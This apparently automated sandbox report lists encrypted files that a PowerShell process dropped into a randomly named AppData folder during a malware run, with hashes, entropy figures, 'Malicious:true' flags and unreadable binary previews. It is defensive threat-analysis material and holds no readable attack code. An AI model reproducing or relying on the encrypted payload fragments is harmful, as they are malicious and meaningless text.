                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):80516
                                                                                            Entropy (8bit):7.9976937994515875
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:vSru5lvGTFhcYAuUzqxOLhenHjrukt1QMQCgXmU/A:vHT0jmzqxgYWY1QMQ/XmU/A
                                                                                            MD5:808824D0E937924D614D3FF07A262C14
                                                                                            SHA1:4165D2973CDC60D375602F370E097F5C47B71DFC
                                                                                            SHA-256:AFB9354FF7D93D1015FA3F16C228A51064C6B437D50B63B964C27B0915AD60D6
                                                                                            SHA-512:6CD45DD8BBBB0E791DDA49D2D9AFB07319CB8617DDB5966C02178F9633389AE6CF27FD09E1C297DA8C25E568C437749613A7D9B037696101B6445A3E94795C10
                                                                                            Malicious:true
                                                                                            Preview: .....|k*....t.8...X...;..C..N......*....F].XV..)A.-.%*.b.'m.4'.!k.9..XT...D..}........e..X.....6.7.c....`d...4*kMg&,4|..5.9sw....d.3.'^n.C~.N.#.pt.....a...u.a......8.@.^9.......K2....1D...Vt....S$8.S"L@.V/H.``ZUjW..%d....f.*.@e...h...)..D....Lu...-.D.C.V.,P.(.....L....Vp.J.X>...C=.z?..<..*._..@15d ..u..x..Q...dH.......lE@..).b.%hcO[.6.s..5.....nsZI.../F..P...U...J....N.h....(.1(.D..n.,..|..6....6.U.........n....2u{.13..;.V1..j......:....$..e5}..HQ.^".*S.....s. ...........l.cH#!rX:v...;!.O..=\K....E...}..O.......h..ge..3V..|..Nm.=.bq.iwv.1..4.......G..TM..PHq.c....F..'..e"G"...[..X{.F.#..&-%.9_l..l.h..V.I1........4KU.8..........]..qi%....HG...ya+!.43..C.>xG..t."W.e.&..[..z..W...p.)...z.b...a...y.`.....s}. .bR...<k6P.Q...8.....[...QU.z...d.....z...f........A4......I....A)..f..J1.d=n..1 ."..TK".K.....#...+.^po...nix.9.`.yM.......K.S..mx."..2........n....g...7=..O.]..=............i.C..`1..~...3m"..Hn.).n.i...bx_`........,|.:UI..9}..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\iVXufIvLOZxz.WslqdKgXMEPjmJUr
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):105858
                                                                                            Entropy (8bit):7.99820308976809
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:0Pc0KTS0pGhdt2V+fqvE9VzbcIqxr8mnYvSO2rDvZkEZ7SZ/7MJZizAhuy4x+Va5:0E0Ke0YzvZzCp8m/fyEpSZ/vAkma5C8
                                                                                            MD5:1E1A94B4DA5546A22A680FBB677FA3AA
                                                                                            SHA1:3445BF056B491CF3137ECD23D00C5733A26D84D7
                                                                                            SHA-256:DD1FF553672CDC53D2AC500618729E091B957024DF4A0F3EF280558204715B18
                                                                                            SHA-512:FAE62B3204F1208593ADD56186E9AAB7B21B3C1D753AF835CF0C6E16085B4A2D7A66C4E49FF29C89B7491486F911413C6A3550EF0C7AADB8F12857DDFBC394FD
                                                                                            Malicious:true
                                                                                            Preview: ..6.!.E.t.Y\....z..R...<..0.V.0k..Q1Mz...... ......)..c..N.i.nU.GC.a.,r.Rw.o2.'.U`.....8.,t..f..`... x7..`'.t.t.p..0[VGs..F...h...."L4.O....$.1...VX....$y..........Q9;&~.G.O.V...Z.1..Nd'..^....X.....2N......<.sT....v.....(O...B....?..R..XQ;\"f..(...T.../gn./.>.R........D....c.7... .....)r....sX...p+.V11..lz......p...+$jMGH-...[..%$..M..E.S..`..*L.d...K.......|.x....#J../...~.....*.c.3O?.}.B.Q.-x.....r.{.4'i...(N.8.e@.....+1_Q.N...L.\-..W..'Hf.m..+|..........Dk:.M..fd8%.1n.....\.#c.I'.,.R.O>Q....Z..R.W.`.......WG.l...9...|..p...R.0....,L.=@z..=.[..U..H.m.#..i......i....p#3....w.$.2{$.E..>..<&I..p.hDcy....C]...w...U.E.g.....y.......J.~U....45.P3B}]+.... ...9..h^2........Z...6<=]8M.1_.^m37........=:..4...aP..g.#y...]....m...S.....""1{y....(.....C.(.{......{V.3....W.2....de..G.Ipa..j.....r.......y..S!..`.1.I\Y.x..g]..L..q..z...Q]....x..q.d.(.j.T..H.....`....H.%..l...C.SD..^.. %..w...{4..>...0...x.}_~l.:..E.....Zey.v.z......A.<|...>......t.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\jHcXtlGToOPIg.RlFEhukcNHqfrC
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):63240
                                                                                            Entropy (8bit):7.996610576038057
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:9g87Q2ffjUZ5Kkyr0mFpcPmgRdsEyPGRrQqI8PYF0BLL:9Xcijo9yr0CsRUPh8PYFkL
                                                                                            MD5:F4B9E0110BC239C485B9C8163E5C38F2
                                                                                            SHA1:B518A64B0ED2A0650FBD19BDD795DE77921FB786
                                                                                            SHA-256:FB156C1E01C3C511C06E60551B2BFDB4E04A97F4EB67B147B3D1DD1334F0991A
                                                                                            SHA-512:9078F39FB739AEF55DE10D597DCF00E5845FC0D01FF52978C5EF5482E02818BD84353039CB27713E309B352AFA6D7BDB1AFE5B5C010D85870383D393D44B64C6
                                                                                            Malicious:true
                                                                                            Preview: ..E#V..n......$.):...Pr.o..8.w...{.|...R'....#..............5.H%.^.8...m....\r...k..c....G...aG..S.......;......_...r.\._.O...O.z1....h.k..'G..b.N/iij....[#h;.P.....eJ.q.&4ge`...\....O...E./.<+n..;.....hd.r..|4>...{.\q.../B...<..5.......M...3...6/..Z....Z....6..Fg1a>fc.q#....FV..........:`*..f.m.\P......^o,..).Kld2.,..j..r....{.Dr..\......y=."..*.g...~.{s.O.2.@.Iz.D'yP..|'X....a..0rVr6..4.R8X%..&.X.K{..."...8b..;.........+).....^.s\jVpxO....i.Y....s.h......".r7.w.k.9.9.i....v...Y...;g....,s..!..=H.f9..3...bY?......m...U.Ab.....[$.E=4B..40.|~.2P..2..e.;........%..?[..._`..hy.{...s.w.&.4B.....SV.]..u.h{......q...%.F..QM..O.;.."....Q..z.&.7..`....-({..(..,.\..l,....P..Q....xT...t......).WN3..y9....*;.t)....^{...q...)`:.e...n....]8.].._....3.y..A.....N.........x^..Hp5.9...q..O.8..7.vS..w.}"?.{....Q{...}.0..l4.Z#.&yt..ES ..R.iUW.Vv...o..4Rn.*H....+g.d5....*9.*.....b.v{.....s.m..`+aQ..e.d&...C..j{G.4>..D.^...H.6..h@.....RO.....m..%5."vu.H)......z.H..2.b.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\kKAvInrXuSO.zTWZlgovnHhuI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):130942
                                                                                            Entropy (8bit):7.998566178400659
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:L1ppHZaU3B/ZM0UXjRQh2d88mkDlAZB0ZHr4Fc7Q0P6ZiPC:Jpp593Ba3XtK2d9mkDl60pic7Q0P6Zi6
                                                                                            MD5:CEEFC4914B1AB0AD1BD9B27A3EE498D7
                                                                                            SHA1:1291271323354CF39BE94DD0760BDE5FADAFEC30
                                                                                            SHA-256:4D6AF44F26FE97387801EA1845AFAFA2F99D2850CEDBBDEC7943688AA3D5AB85
                                                                                            SHA-512:2AA3F5D90E8421982F6D6CC7B5FF095F92BD52E7E2CB4A1C4D39574EBAFB2BD02EC9A65723583E5A7AA33C18AA7E994CFB2FC3008D14DF9AC7D1B277AA4674C3
                                                                                            Malicious:true
                                                                                            Preview: .".....\....u.v_...........=..8A"i..W....j7....}....2a....X..3....7.~h........y..%.1.....t..)l.....k..3..AYz.V.2F{_.i>8.A.....lf..+|...qNMUo{.........)..?.u.....v..s........ B>._t...}}l}1z..h..\.,;=.v..pd.6..7..q..8!.Q..?.]...,.."..&....G.....dk..4....c..bZd&,k.e~,*.@..wn..ZoYM.p5.5lA....z.....?..... A.Ks^... .5F0...3$"0...+....}R..+,^...nY.S...T2.....CK..2g.{.>..."V.1l...:E-..h..$...|...9.q.....;....j.d..".-.N....`....k5.]K..Y9..?.Hv..v...)#...W3.._35........F...ee...._..T`.s..N.\..Ac...%.).j.6U'....p.(..Y.....&Bj.$.F..7.G...v...Z..j%?.P.c.87.x.(..1&@.A...FI..fbI..".Ec..op...Bi.....~...~........Ls.P:0%u.\M..J.5..Su.%`&.9._.u*....p....G.t.ih....+_".M2*s...rm.oT.-q..W..1]HC.UYI.I.NFJb.=...d....th..`U.F..7........>fN.....P.b44.....!...M3+2H.......&.......,..s<:"....@^...<.B-U+d..l.<E .. .(..~...B.Y%..;.....^..<...p..\N....1J.4<.:.......W\!"P...'..3.E..Xn....K.:.. .o.....j2bK.A.U?..P...6U{.^.u8......-....&.tR=..^.../.....`6..*6.M.y&s..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\klgNQBPouRDhqUv.vwojHfsturgXbnd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):187417
                                                                                            Entropy (8bit):7.998967451139334
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:scHn0zbif8Zu91MsfB7GpdQxmgj/sgzvXnzueAEiuJJh9/+b5NlyFmsu69XY3pXp:8Cf81s6Gm52KXEDp9/fFpaL
                                                                                            MD5:96B859B2ACF766433C2076ACA857A094
                                                                                            SHA1:209DBF34B4AA6388F73BD86C85B6E3FE68D955CD
                                                                                            SHA-256:97FFE6D4BF5634FF3CA198DA5F5AB0F40C108CFEC887C18633646FD6D8703E84
                                                                                            SHA-512:AE5145346033648CB1F9446BF5E256AD0754B36542B8F67C45295DFC6AD6357E9C453DF317FFCA31C60F6DA95880C2FBE3A607FD56CEF5FE7B859A207D13F0C5
                                                                                            Malicious:true
                                                                                            Preview: 0...%...Fk)............E6#;.D..h....[6oI*!.X.x....Z.....^....NK.h.. ..@y..>`1.N..Z.....Q.{..:.Q.....kI...9..r..X...zx.~.-$.w...S...*....-L....6q.iw...,=.>%.S..9.........sK...W..;CUd...UHu..+.\.`.D..L.q..T...3L.I.6_xpp...M. ..M.p[f.t....D...eevx..K.;O.4#]...SB:.._RoC...oA...[.`..KH...Q@.C -7...s.$..C.O...l..^....%.H..tz.W8P....;....MS.m.bA3.U...#.@.........7"...C.~@...8[...s.5F../.?.U.I...(......#}.E...o..Q?T.?.|.......8.^..;.._"z.....Xa.T..Y...Se..Q..R....2....?....p.....9.Q......0.R..........X.....A.Zq6.0.......J.r.c%.......T0...\l..x.....&~..BDm..B\...@..^..... Db&Qv..e.h...Td.;.|A...8ju..3......&.7..D.....$.0.M...=..r..n|P.F.tE.mCQ..{h..G`Qb.|[..<..x...-./.u.....s..^'..+?....=.7dI....w.9^.1.s...`.a....YVh!.Z.7.]y..@..s.(..t+...5S."XO.ed.V..A`6n..*T Kz.r..`.<.=...B;!H.N......1..v..=..~J....oOY{.3.x.D....).........:.gIZ..Vl.+..Y.&p.ES./. h....5...x........I[.....y......5G....6...Z.3...07!.9"....W...=d....35...Rr...c..fy.$.$G...-.....(.L...#.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lGMphzrcTveNIbnSDuB.lXxNBiIAcT
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):107809
                                                                                            Entropy (8bit):7.998127397020591
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:KgOSpMFYbAICuCKbYwnPcMEf06qaoHbtwJb41VQWuEczQQE7s4/9Z2BXfeEnz:0JFYbAWLYw0MEJo7tvbuzEz7rjoXmEz
                                                                                            MD5:2C04D82C7AFF6C9CD1B1D0E16FCB5927
                                                                                            SHA1:830AA3549FF19E089EA7DF3FF790993803191409
                                                                                            SHA-256:F82B735DE273B95CD61982FA7CF85E4DC1BC28194C4F5C2AFA2FAEEAB8A77321
                                                                                            SHA-512:4BE373BF6DE102F2E47EB5E08CBD84AB867616F4F7A1ECDE17BE75EE7ADD75DCD79B875F617F8EB8596170DCABBE09588EA3412B74541697519C5394812C27A6
                                                                                            Malicious:true
                                                                                            Preview: .h|.&.%}.YC.,...WseeM$.?...&..E..[....h...8.X.....=+..n=.t-.W.p.v._....U.B...pY..Z....w>......w;)E.......BS[6..L...e.....?C.s.....G.5(j....P#.e...+.g.D.....)u..Z.jA....ST../...@.......OrK.,..."....."..n....oX....5..>.'l,.....}.]P.}....s_.......#@.cJ.PA......}:.!Jg...1..j..s....Y...m.|..nA.......KEB..V.t'd5.<........G....B.,A[|.W.g......c..3- ....VN...P.......v...Ds._.Fl.".?E.%.\..*_..w.#...BwOO...3.O.v....!../....y.O.t:...A.....(k0..T.......qV.w.7.-.........x......-q.s....x).{.D.V..E%...."j.\..&AB.g...Y.adL....o-..L..(.......*.T{........s#.....K/+".Qu..bIe..E9....>.U.(..Y..w.....z)...v.Z%.-..`v....c.X[.....EY:..n3.k...\.,..I"......".p....m1..+1..1_.[,.`...o.].WG.=....=!._*EXk......?|%m..*N...^...%g.i!.c...._LWt.C.0^..3A...xN...Z...Uk<.SQ......Z.,>4.....~.4...d...]....V*5.m..Rq...~:.]4.0~.!.[.I..6f/..RYv.,|...W[.B[8......4..H#....y..,.>..uq.;.?u....6..:..$...Y...L.c..y.{..oZ.kPdf.'M.d.Hs..W.%.w.u}].<.$....;....}<.d....3x......R...Q*+..(sS}7..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lKRdxuzNOmjsMkStLW.UwzXkbdQLrAWHEhv
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):128259
                                                                                            Entropy (8bit):7.998479326526466
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:mhmKJPGMXfNhGH80yYtGOHEmKiHhHiiJXf5YkVvZfrN+gr4gWJCuU4HUiMZs4zAJ:mIMLbzYt7kOhCYflxddl4wO/Sxq5jdtr
                                                                                            MD5:C6B46B28D89DD335FCCB8182D7194042
                                                                                            SHA1:EF80892A44CE01D91DCFA5314C240C1DAF6836C7
                                                                                            SHA-256:65A3DBBACE53CA36A218F39A070190F263314B98CB74137A67E7816A7FE174C5
                                                                                            SHA-512:F49A2364098EE95EFD7F58076DBA8371D283FAAA8C9F575047683588EA137F9B6D7E39A3317F11E094A94B80279C7DBFF57E406A679CB4C024F6623C1804C590
                                                                                            Malicious:true
                                                                                            Preview: ......!.....'..R.L....:.,....*..V.#...hW.N....q.\....M.Y1...k....@.B..l1.F0....X...j..*....C.Ca....'6.N+..`.I\...f8i.6z.D.f...b?^..,......d,..q6..)+....UQ.."c!.....V..F...q..8K...3...;.Ma..l...:.%...K....pGml]........t%.,;..Y...%wks.`?..8..x.M"...!.P.~QW..c.sN.7.r..Qc..sn1.o...L..........!......i.6...l6L....O'Q.b....H. .R...HB>..>w+*...!....jR.#......y..Z...j.|x..36...A'.N..q:..>w.&D.^.5.#...ZX?.....!*...T5......6......VJ9%.....W.F_#.]tLdi..t..mp.....%....u.}[.8]D..cyc......U..0./W. .X..|...;0...C.re...?.. $.L...t#.Rp.d..,.p.{....*.......|.W...[.h.r..GE.+.n.U[8_k....8.e....?.a.S.q...4.J{...@..l.Y.:MR..RS......E..C..B.....NL........&);..PM..y....(...KB......Z9..x.....&...hP.Q`;...>.S.q7.nU......../....D!gu.M...bZ..Q....G..p..f.m.....z..$ .B+F...1.d.i.g..a...Y.-a...y.......y.<t.9..G....>x</........o5.5...;.3w.O.&.....uW......5t,(....0...D.U..1....8...?.ZT...wAe"..#.U..O'...x...E<uu..5?.......{2.usb.g.:..s.6....).*]_Z...Z..-.Z..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\liFAaWLePtdOXCRGpuQ.tSMqFINOpJZVrnmQ
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64349
                                                                                            Entropy (8bit):7.996895365099058
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:moa1sGJtuCqNiM1UZMARB7GunEZno3zH5L3lsl/:mNmNiMc3+Jto75LOl/
                                                                                            MD5:D9C27531B5336491C47C4722EDEE31B2
                                                                                            SHA1:4A27BAF3E7289B2FEF8512D52156BA6A30AC1A58
                                                                                            SHA-256:B6BA6904FCBB85D50FADF0359CB70DBA39C3EBA35080653E9F5D35AF9F79AD13
                                                                                            SHA-512:351DADF2E9BFBD4C055DAFC1196DF69812CB47D2F103BB3192F8C5565A65F6AB7611618981F770C3E63AD2BE02340302C5E4AD6D79E3A9702D7F611FFF5BCD9B
                                                                                            Malicious:true
                                                                                            Preview: )...u....Z.B..}o.}.:..?/.P.'..4.7..>(.U.M.:........7...E62,.......bgU....Q|.). g.7l]....."..wA....'X.D..T....v.O......p.s.. .9...".....m.'.1..G...X4..?.!....K...@....A<I.A..p.r....An.qh..kmO.....3.....m....9..).y!"..\.5Y......>.r......\.'.C.....4~UN..'..Er.d.jL..m....vR.1....ZC....g..oC4.skJ&X...OL.L...........Wv..{.x...:..<...B...@=..l.iUL..\..3X../..n...dU]....8...,..m.;.*IZ.o.3.....Y*...6.O..w..H..h.z24.y&].sJ....L..(.v.8W#n..V..l^.)v.o.....w...0..........Cq..\l._kt.FPgDe$...{....,..Z.|...} ..[...v..Lp7M.ny...A...0.........#.2$...s..~.'....;j{0+j.... ..M*.<T&0.....s.Fr..8....i..k.X.9S..FT...p...0._y.....4.qz:[.hN.}=.}....F..").~.A.M;.ik....3.R.Y!.4.C:..X2.H..uk.i...............q...p....#.1w8G8,?....`}}x.!......)..?T0.5....X..N..-..L..I.Y.-..l$.....*ip..oX..B.q.0..L..s...o..I\..d......`l.Hn..........V.....%&.CG... c.q.i*}e....k....Mq....F.L+e7w..{.).G^+..B..a._G@\.8X..Z_U..Q.Px.....R:.EF........$..|...U.zM/...q.u."....:S.o..n.u..r"...Gu..N.n
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lpvtEnzFmSrBxs.bvthIxBqKRcrP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92827
                                                                                            Entropy (8bit):7.998071560610671
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:FOBOv2yKOORrHX2FXsvOlQjbpXAZY/4ixEuosllyA9YihnkFl74zMhCPj:FOIvDypvOlewqMcf1gZ4AhIj
                                                                                            MD5:5C5ED14E7ADCCB743F598987D65FE36A
                                                                                            SHA1:09769F6ED7AEFA8CB50D2B82F1C72FCBEBCB5AA7
                                                                                            SHA-256:C50741EAA758B4EA4071101A68FF6AE1829AAC73BAD37695041334D778F518DA
                                                                                            SHA-512:80CD731B626F135A6FEB9E7986DB5D99BE42462296B706AA2040BC1413C90826B5AADE7B3DFA9A59E6F02CEC9B7DF97956C6A267C7C799BD53F376E61A68854D
                                                                                            Malicious:true
                                                                                            Preview: .W.......I.).~@n....-..:.5...2./..d.w7...{5~...p..5W~.T.]........?>....@|.c4..f.i.`.......?oN......V...........^.i%".m......u0D<.c.>b..k.s...>..\.o..."L.....E...FX.....%...k.;...i*..s..v/-.s.)....Y .v.b.m......8.n..%~C.o.v`u.5(.gnQ..)....p.m.U.=-..k4..~..#........7.{R.......!.8r .&2.|3l......?Y.....R....|h..m.r.q.j..M...12..8y.1.0S..y....8.H.7....K..{...0P.)A....n'..K.B..O."/6;.K$...6..F>..j.....j..u0......^m.i.>I...JL.E|..8....w.........v.6..j.E.y.(#X..%..;.u...N...?].-......N.R.8.......:..c...l.)..&R.Io.5....N...%..4S..y?<j..6....[.M../&L.F.....\.].../..Q.u.....i..W.,N.3.>.R.D44.?..}i..p....Q..Kfc5Y.h...lurAX.m...!.t.X.[y......^.;...\.._#^a..,._Ec..M..#..G..oY....=...........1.n>.K.w.,../{...6...T...6U........... .M..._}......e...b.p.i..O...+.`....8........y.kS...........u!!.n.p....^^.eU+..%....>lO. .$.c.qA....n4.sQX.B..:.O.?.x.2iJ......... ..T*.g._..>3.dL.b....b~Xz.].N..m..]....L.=.6.t.:.J..^......u..g..Q}...z..I.."..=.<.xm.
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lzQLsCuXKpNJRnD.EYoPxpsTGlaKum
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66656
                                                                                            Entropy (8bit):7.996903688332996
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:unx6maaILof79w/4oTz9lmpIHLtHGfecXi4vM7Zp4fbiYgFB:uxjBxw/4S94pIZHfYvupd
                                                                                            MD5:9746FE63D54C87CDCCE696CAACF9F101
                                                                                            SHA1:642B32EE62C9FBF7DEC244F238565314C7C63566
                                                                                            SHA-256:1E91D537EDE4BF5E53A8BDCE50C7CB632F916070C0D79C3CFAFD52CB6B688996
                                                                                            SHA-512:4AA7758B9E5C9334107EB8AFD77F9E9E317F3A9057D6EB58C7CFC5B015C6456E18F99308EA7DA3BD756F8460B117E27024691122B4097AE40C00C45CDFE88E23
                                                                                            Malicious:true
                                                                                            Preview: A..,.4w....>.i0.C....q<.........0:;Hv;...9c..Tj...D8r.@.H.....:.m....zd.28.K.@6t..&....._...-A.f.>._.$]...:..L.[L.S.1zugX.m.Y...Y........s......w...5k...-..<..Cm.i..7].....Z..V....w9.....7..Ig....@...v.F?..]9...:.a...).............F..8..\..k..i...............h....v.K.(C...D.B........_..H.;.!.7..'.xt@Pv.n......:..Hubj....}...'O~..l.[T.Prj9.*}D..Po}.Xg...N...}.p..3........s.9s...e.....J..R(..o...{..`...0..../...2.q..[...T..v...=A......:.2,#o..=.c.5.N...ST....x..H.oJ....1h.t........A.3...c1........o_m.4.g...Al.QS.V..=\3.p3y.0.\._DF....u.u..7........,m..f.._gi.p......7o......Y..._.3he......7.}....yB.,,.])...{O.....U.4.(.v.].h5/..0Q..{..._...}.....0._.6.[:...g...K..L...!......6g.V..ra..5.)....O......>.o.Qw5)..?..Y...#.b5.~.mas..o~...x..Z..u......@.*..6.F{.O..sL.....$....b.g...R~..Y.d..l.C.j..){...!O.D..J.......v..[W.9'.._.....o1.d.....)._.........@.....J..`lW...d@....... =.,.K...n......`=...i..h....t.f..q.{> .@.....7.Y2.4.z..h.@.....x
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mAaRvDrSculntQg.MCLcbUpOkDw
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):180258
                                                                                            Entropy (8bit):7.9988047315485495
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:cm5E35QBrLkaa97vy1YO9p+Vwm/W1IrxZEHgC4C9W/u0isu6xdVKOWYq:D0paZ9p+/9DJBiPDOq
                                                                                            MD5:E1BCC10E798898D3EE2AF6C881311C80
                                                                                            SHA1:5A8DAEE9CF2DF8ACF4C64FBE85D5C69A1810D375
                                                                                            SHA-256:B1E56C73643CF8B9BDDC329AA1ACA99C2C14C0E01E6CD2B144C944D59C243F0F
                                                                                            SHA-512:FFFB56AB729A93F6AD7BDB27A646F93BFDC46DF8325F14F808B32D3D08B0188895E7FA512C46ED348EB8188767FF6BFCF319A05B7330EBBEE2BA70EC92033E5C
                                                                                            Malicious:true
                                                                                            Preview: ..R.;...T.b.h......y.{..!R...).).......`yVW.!~.yi.P..,..X...3&W.........?.G#...Q.C... ...zo.L-S..LG...t.`..,..].vA..a.)J.z.....I..n.<v..y*W]...y...p.......}k,...i......ti.a.r(].o..<....5q..o....Xvo...l\(N.+.Xq.j...B...j..>.[......"......._.j8..g...Hzp..".mj.>..Gq.!bO.r..z]..I+.S..... ..a..Jx....a.85.lUo.E.".A....na.1.......zB...._....*..>.n..1..O>{..FA...V....w.yJ.........R.n..jNw.........]..1k...e~.....X.....)..2.....n.R.[.B.....f.+....x.pM.#u...R...D...._.v_......f.d....q....M.;i..4=L.".....0{d..[...bmn]..<.$?...r...o.t..]!h.o%.K..z..2.....eI...?.dm.D...;...D...b....-oU..g...>/cX.kq5J>!..D...q;.%../w7.P..9...}.@...[,L.q.W+q.>...C.3.m ...$...F.c.o.........lC#..9...^5:~.zL.Wd*..@O..v..B.2....V..b4z..pC.n....V.D......{.K.p......H.$..G,..I..A...2.u.;..$z.....".... .oGmj.1.......@....V.1/...4......%.[..T&..7../.....=..?....]..4.....0.?.._.'...'......Vl.%.J...7..G.....)....f@.D3.5..d...._G....v...).......itO...L.........)...EJ...I..C.)...
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\mYSrPVTEqWZeX.EgMFikpUrCjD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186945
                                                                                            Entropy (8bit):7.998906025687325
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:njrlgjeFKQZKjVlGxi2Xv+blqymX/H9MLB/ZW8kiG4sLS+a7cE6nDbFf+isrFcI:jraytZK5oM2XOqnPHM/ZRLOCriWisH
                                                                                            MD5:FC1A651B72FBF6044C6C67184510FCB2
                                                                                            SHA1:22780E828B80E108B8F84118D613ED12693A029F
                                                                                            SHA-256:C8FDFC3F74C420503501A9E1F1BE5E8194885E653C652073E047293263B8AFB6
                                                                                            SHA-512:3CF7C40B0D90C6C35E497DB66709F03924B0B2E79C8FE5A208FA93ABB474107F5B530CC63A81EBFFE03822B4A04D032679BF4D912CD092646A0C787B421C43E7
                                                                                            Malicious:true
                                                                                            Preview: u|..,...f.\..C.e........'!...+.b#VY.P#..h.....B...FyY.....Q.j...c..Z..h.....\GX.w..:..\..K.`..;^0|.w..JhVs.lpU..~+.SzU#..z9..P.,.\....u%.[..........SSYb......)..".c..o.032......O.\.H,.j..6.....a...m.#.'...}Cg..(..@7.R.._..P.......9.!....u.m.s.. p.X..(..n..+.?...]U1....O...r..H......(.!.X... ...t..N..Q!......T...2.E...)Nw.U....#......Z.%..H.R...}keB%cTS..gJ.......8.U..`X...N.x!/.h..r..9#.*..5.w%P.W.(.\....|..)...X.r..1..yc.=)au.|.......|;..Z?........~[Sf7`S.y_5]........Z.\y\......BKSk.<T..Q..C......l...\.....Y....f.6$.6...p...A......g.Z..U].-.R$N".A...6,...O.?.L.X..H.<'c..#.......= ...l.....g...f]....}f].Gwif..(.`8.....jiet/.".l.x...v..$JhX.Y../g..D.4.'..-M%.....F..uTJ....^......(.C..X....t{G.Z{.'7.H.....~21...bgla/.....k.....x...-b.Jn..O.....c.K.7:1...y...q.U.,5....6A"y. ....{.-........:..a.Z........~c..#..mm.84...;.........U.lE(3....2..F.....W`1...&.C....;...^:L..jK..;r1...D:*TI....k..~x......ga.. .........oDP.T....7...;sd..
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\nthwmpDXQUGoBH.RvHaDZmNlAocXVgTxL
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):122518
                                                                                            Entropy (8bit):7.9984639844118
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:im4lnVFgxLqRjZul8n2/yT8Fbt09q7jMcI:im4bbAlb9F+9GY
                                                                                            MD5:76A5202385CF0D78078669467FEDB52C
                                                                                            SHA1:7B67821EC5D85A7A9B17F2E592BEF120E2D04A2C
                                                                                            SHA-256:049C356C4AD6882D7844E3D844FE1EC7D01F641462E8BBCA7C21DA9CF909A742
                                                                                            SHA-512:BEE943A8D26F0AC122EAB357E8D85E69C858E1CF07F36314FA5D5592B0539BD6680E15E5A0A98462601FA8AEE2C5032E3698B43773852FB7102DB7D337A34F8E
                                                                                            Malicious:true
                                                                                            Preview: .....Z.t...w..3....4...dk...'.G....t.V{B.z.C]....%..Gyn4.../mW...!0o......'...V}/..3...aV......p....1......[..tt.Z..u.c..(B.:..T....".X.o......x....../T.=....v..x.Qs.3.....L...[.z..{?.ROv.....G.? &....1X.4...........J_!.......ZtJ.@g.(."%.....?."..B......E.SWXGh.se.'x..%....].......Fd.X...fGKZ.Y.X...h.$x..r%.i...`.. :.tAS;9........f.....u.h......8..c'\.>.L._F.....j.O.:9...r.C....Y.vQx..m...X..:..l...d.qw..kTM~..F`%.3.>.JY...l.;..x....O..........;..c..{9...9....f..R...y.'@G{7.x...^z.q.._Q....IU....s....T..t^+...^..W.Hv........f..5....!.....`.+.f....*]P..@.....K......:.....{_..../..a....H..L..+.V.'..u3...Q.ur.b...h ......>..c....[...z......K......m.....&...lp.%.b.#.$b!....r..S....}.5~.....Pe......H...dO.!(.R.c..,.l.PIM.....$..O.K.......&9...m..k.V7.rn..^.V...jL.l.uZ...".....Z.7..S.Q.'....4c,.m..T...3SOZ..k...Z.q.=.]3...........~5..4.."d.....G0....B.Tb..%.w...<.=............T./......M..}{.W..}b.f.'...)QN.....+UI...P..!.i..G.4b'J.
